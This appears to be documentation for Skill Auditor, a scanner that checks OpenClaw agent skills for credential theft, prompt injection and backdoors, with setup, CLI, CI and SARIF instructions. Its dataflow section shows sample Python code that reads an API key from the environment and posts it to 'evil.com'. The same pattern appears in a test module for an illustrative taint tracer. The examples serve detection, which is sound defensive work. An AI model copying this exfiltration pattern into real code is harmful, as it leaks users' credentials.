Skill Auditor
Security scanner that catches malicious skills before they steal your data. Detects credential theft, prompt injection, and hidden backdoors. Works immediately with zero setup. Optional AST dataflow a
Enhanced security scanner that analyzes skills and provides comprehensive threat detection with advanced analysis capabilities.
Run the setup wizard to configure optional features:

```bash
cd skills/skill-auditor
node scripts/setup.js
```
The wizard explains each feature, shows real test data, and lets you choose what to enable.
Scan a skill:
```bash
node skills/skill-auditor/scripts/scan-skill.js <skill-directory>
```
Audit all your installed skills:
```bash
node skills/skill-auditor/scripts/audit-installed.js
```
Run the interactive setup to configure optional features:

```bash
cd skills/skill-auditor
node scripts/setup.js
```

The wizard stores its configuration in `~/.openclaw/skill-auditor.json`.

```bash
node scripts/setup.js                # Interactive setup wizard
node scripts/setup.js --status       # Show current configuration
node scripts/setup.js --enable-ast   # Just enable AST analysis
```
Scan every skill in your OpenClaw installation at once:
```bash
node scripts/audit-installed.js
```
Options:
```bash
node scripts/audit-installed.js --severity critical   # Only critical issues
node scripts/audit-installed.js --json                # Save results to audit-results.json
node scripts/audit-installed.js --verbose             # Show top findings per skill
```
Output:
Works on all platforms with just Node.js (which OpenClaw already provides).
Requires Python 3.8+ and tree-sitter packages.
| Platform | Python Install | Tree-sitter Install |
|---|---|---|
| Windows | Pre-installed or | |
| macOS | Pre-installed or | |
| Linux | | |
Note: Tree-sitter has prebuilt wheels for all platforms, so no C++ compiler is needed!
Traces data from sources to sinks through code execution paths
```bash
npm install tree-sitter tree-sitter-python
node scripts/scan-skill.js <skill> --mode strict
```
What it detects:
Example:
```python
# File 1: utils.py
import os

def get_secrets():
    # Source: reads a credential from the environment
    return os.environ.get('API_KEY')

# File 2: main.py
import requests
from utils import get_secrets

key = get_secrets()
requests.post('evil.com', data=key)  # Sink: dataflow detected!
```
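To make the source-to-sink tracing above concrete, here is a small two-pass taint tracer added for illustration; it is not Skill Auditor's analyzer and uses Python's stdlib `ast` module instead of tree-sitter. The source/sink lists, the `MALICIOUS` sample modules and all function names are constructed for this example.

```python
import ast

# Constructed source/sink lists (assumption: a tiny subset of what the page's analyzer knows).
SOURCES = {"os.environ.get", "os.getenv"}
SINKS = {"requests.post", "requests.get"}

def dotted(node):  # 'a.b.c' for a Name/Attribute chain, else None
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute) and (base := dotted(node.value)):
        return f"{base}.{node.attr}"

def in_order(tree):  # ast.walk is breadth-first; sort so assignments precede later uses
    return sorted((n for n in ast.walk(tree) if hasattr(n, "lineno")),
                  key=lambda n: (n.lineno, n.col_offset))

def is_tainted(expr, names, funcs):  # reads a source, a tainted name, or a tainted function?
    return (expr.id in names if isinstance(expr, ast.Name)
            else isinstance(expr, ast.Call) and dotted(expr.func) in SOURCES | funcs)

def track(node, names, funcs):  # on `x = <tainted expression>` mark x as tainted
    if isinstance(node, ast.Assign) and is_tainted(node.value, names, funcs):
        names |= {t.id for t in node.targets if isinstance(t, ast.Name)}

def tainted_functions(modules):  # pass 1: functions (any file) returning source-derived data
    funcs = set()  # matched by bare name; this toy does not resolve imports
    for src in modules.values():
        for fn in (n for n in ast.walk(ast.parse(src)) if isinstance(n, ast.FunctionDef)):
            local = set()
            for node in in_order(fn):
                track(node, local, funcs)
                if isinstance(node, ast.Return) and is_tainted(node.value, local, funcs):
                    funcs.add(fn.name)
    return funcs

def find_exfil(modules):  # pass 2: (file, line, sink) for sink calls fed by tainted data
    funcs, findings = tainted_functions(modules), []
    for name, src in modules.items():
        tainted = set()
        for node in in_order(ast.parse(src)):
            track(node, tainted, funcs)
            if isinstance(node, ast.Call) and dotted(node.func) in SINKS:
                args = node.args + [k.value for k in node.keywords]
                if any(is_tainted(a, tainted, funcs) for a in args):
                    findings.append((name, node.lineno, dotted(node.func)))
    return findings

# Constructed sample: the page's two-file pattern (utils.py reads the secret, main.py sends it).
MALICIOUS = {"utils.py": "import os\ndef get_secrets():\n    return os.environ.get('API_KEY')\n",
             "main.py": "import requests\nfrom utils import get_secrets\nkey = get_secrets()\n"
                        "requests.post('https://example.invalid/collect', data=key)\n"}
```

`find_exfil(MALICIOUS)` reports the `requests.post` call on line 4 of `main.py`; a module that posts a literal string produces no finding, and a direct `data=os.environ.get(...)` argument is caught without an intermediate variable.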
Scans executable files against 70+ antivirus engines
```bash
export VIRUSTOTAL_API_KEY="your-key-here"
node scripts/scan-skill.js <skill> --use-virustotal
```
Supported formats: .exe, .dll, .bin, .wasm, .jar, .apk, etc.
Output includes:
Uses AI to understand if detected behaviors match stated intent
```bash
# Requires OpenClaw gateway running
node scripts/scan-skill.js <skill> --use-llm
```
How it works:
Example:
GitHub Code Scanning compatible format
```bash
node scripts/scan-skill.js <skill> --format sarif --fail-on-findings
```
GitHub integration:

```yaml
# .github/workflows/skill-scan.yml
- name: Scan Skills
  run: |
    node skill-auditor/scripts/scan-skill.js ./skills/new-skill \
      --format sarif --fail-on-findings > results.sarif
- name: Upload SARIF
  uses: github/codeql-action/upload-sarif@v2
  with:
    sarif_file: results.sarif
```

Because `--fail-on-findings` makes the scan step exit non-zero on HIGH/CRITICAL findings, add `if: always()` to the upload step if you want the SARIF to reach the Security tab even when the scan fails the build.
Adjustable sensitivity levels
```bash
--mode strict       # All patterns, higher false positives
--mode balanced     # Default, optimized accuracy
--mode permissive   # Only critical patterns
```
```bash
# Scan local skill
node scripts/scan-skill.js ../my-skill

# Scan with JSON output
node scripts/scan-skill.js ../my-skill --json report.json

# Format visual report
node scripts/format-report.js report.json

# Full analysis with all features
node scripts/scan-skill.js ../my-skill \
  --mode strict \
  --use-virustotal \
  --use-llm \
  --format sarif \
  --json full-report.sarif

# CI/CD integration
node scripts/scan-skill.js ../my-skill \
  --format sarif \
  --fail-on-findings \
  --mode balanced

# Scan GitHub skill without cloning
node scripts/scan-url.js "https://github.com/user/skill" --json remote-report.json
node scripts/format-report.js remote-report.json
```
```bash
# Works immediately, no installation needed
node skill-auditor/scripts/scan-skill.js <skill>
```

```bash
cd skills/skill-auditor

# Install all optional features
npm install
```
Or install selectively:
```bash
npm install tree-sitter tree-sitter-python   # AST analysis
npm install yara                             # YARA rules (future)
```
VirusTotal requires API key only:
```bash
export VIRUSTOTAL_API_KEY="your-key"
```
LLM analysis requires OpenClaw gateway:
```bash
openclaw gateway start
```
```json
{
  "skill": { "name": "example", "description": "..." },
  "riskLevel": "HIGH",
  "accuracyScore": { "score": 7, "reason": "..." },
  "findings": [...],
  "summary": { "analyzersUsed": ["static", "ast-python", "llm-semantic"] }
}
```
```bash
--format sarif
```
Uploads to GitHub Security tab, integrates with pull request checks.
```bash
node scripts/format-report.js report.json
```
Human-readable summary with threat gauge and actionable findings.
```bash
VIRUSTOTAL_API_KEY="vt-key"   # VirusTotal integration
DEBUG="1"                     # Verbose error output
```

```bash
--json <file>          # JSON output file
--format sarif         # SARIF output for GitHub
--mode <mode>          # strict|balanced|permissive
--use-virustotal       # Enable binary scanning
--use-llm              # Enable semantic analysis
--custom-rules <dir>   # Additional YARA rules
--fail-on-findings     # Exit code 1 for HIGH/CRITICAL
--help                 # Show all options
```
```text
skill-auditor/
├── scripts/
│   ├── scan-skill.js          # Main scanner (v2.0)
│   ├── scan-url.js            # Remote GitHub scanning
│   ├── format-report.js       # Visual report formatter
│   ├── analyzers/             # Pluggable analysis engines
│   │   ├── static.js          # Core regex patterns (zero-dep)
│   │   ├── ast-python.js      # Python dataflow analysis
│   │   ├── virustotal.js      # Binary malware scanning
│   │   └── llm-semantic.js    # AI-powered intent analysis
│   └── utils/
│       └── sarif.js           # GitHub Code Scanning output
├── rules/
│   └── default.yar            # YARA format patterns
├── package.json               # Optional dependencies
└── references/                # Documentation (unchanged)
```
v1.x commands work unchanged:
```bash
node scan-skill.js <skill-dir>                  # Works
node scan-skill.js <skill-dir> --json out.json  # Works
node format-report.js out.json                  # Works
```
New v2.0 features are opt-in:
```bash
node scan-skill.js <skill-dir> --use-llm          # Enhanced
node scan-skill.js <skill-dir> --use-virustotal   # Enhanced
```
"tree-sitter dependencies not available"

```bash
npm install tree-sitter tree-sitter-python
```

"VirusTotal API error: 403"

```bash
export VIRUSTOTAL_API_KEY="your-actual-key"
```

"LLM semantic analysis failed"

```bash
# Check OpenClaw gateway is running:
openclaw gateway status
curl http://localhost:18789/api/v1/health
```

"SARIF output not generated"

```bash
# Ensure all dependencies installed:
cd skills/skill-auditor && npm install
```

```bash
DEBUG=1 node scripts/scan-skill.js <skill>
```
- `scripts/analyzers/static.js`
- `rules/` directory
- `scripts/analyzers/ast-python.js`

```bash
# Test against multiple skills:
node scripts/scan-skill.js ../blogwatcher --use-llm --mode strict
node scripts/scan-skill.js ../summarize --use-virustotal
node scripts/scan-skill.js ../secure-browser-agent --format sarif
```
This scanner is one layer of defense, not a guarantee. Always:
For sensitive environments, enable all advanced features:
```bash
node scripts/scan-skill.js <skill> \
  --mode strict \
  --use-virustotal \
  --use-llm \
  --fail-on-findings
```
© 2026 Torly.ai. All rights reserved.